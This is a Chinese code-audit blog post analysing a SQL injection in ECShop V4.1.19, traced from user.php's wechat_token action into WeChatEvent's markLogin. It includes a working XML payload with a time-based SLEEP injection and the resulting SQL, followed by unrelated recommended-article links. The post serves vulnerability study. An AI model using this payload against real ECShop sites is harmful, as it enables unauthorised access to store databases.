【代码审计】ECShop_V4.1.19 SQL注入漏洞 分析

关注user.php,当$action为wechat_token时

从php://input中获取xml数据,并解析,从中取出Event字段作为$method

最后用call_user_func_array调用new app\api\controller\WeChatEvent()#$method

我们来看app\api\controller\WeChatEvent()这个对象

它的scan方法调用markLogin,且从$data中提取EventKey和FromUserName字段

markLogin,存在sql注入

构造payload:

复制代码
<?xml version="1.0"?>
<xml>
  <Event>scan</Event>
 <EventKey>' OR SLEEP(5) OR '1'='1</EventKey>
  <FromUserName>test</FromUserName>
</xml>

拼接后变为

复制代码
select count(*) AS total_count from ecs_user_official where name = '' OR SLEEP(5) OR '1'='1'
相关推荐
优橙教育11 小时前
零基础学AI应用开发要多久?3个月能到什么水平
服务器·开发语言·网络·php
郭萌69615 小时前
多商户平台的优惠券,真正的设计对象是「适用范围」而不是券模板
php
额额额对了15 小时前
嵌入式 Linux 启动程序文件
开发语言·嵌入式硬件·php
v:ychya201816 小时前
独立站外贸建站公司怎么选?建站就要建营销型网站
前端·php
梅菲塔亚17 小时前
华为云从入门到实战
开发语言·华为云·php
要吃这碗饭17 小时前
AI 智能体如何通过 auth.md 注册 Bright Data 账号
数据库·人工智能·php
霸道流氓气质17 小时前
幂等性与 Upsert:防止重复操作产生副作用的技术
开发语言·php
qq_5434478218 小时前
DNS解析怎么排查?故障处理与运维实用手册
运维·服务器·网络·php
ZHOUPUYU19 小时前
PHP 9.0 前瞻:下一代 PHP 会带来哪些新功能?
android·开发语言·php
ZHOUPUYU20 小时前
PHP 8.2 的核心高级特性,包括只读类、类型系统增强
android·性能优化·php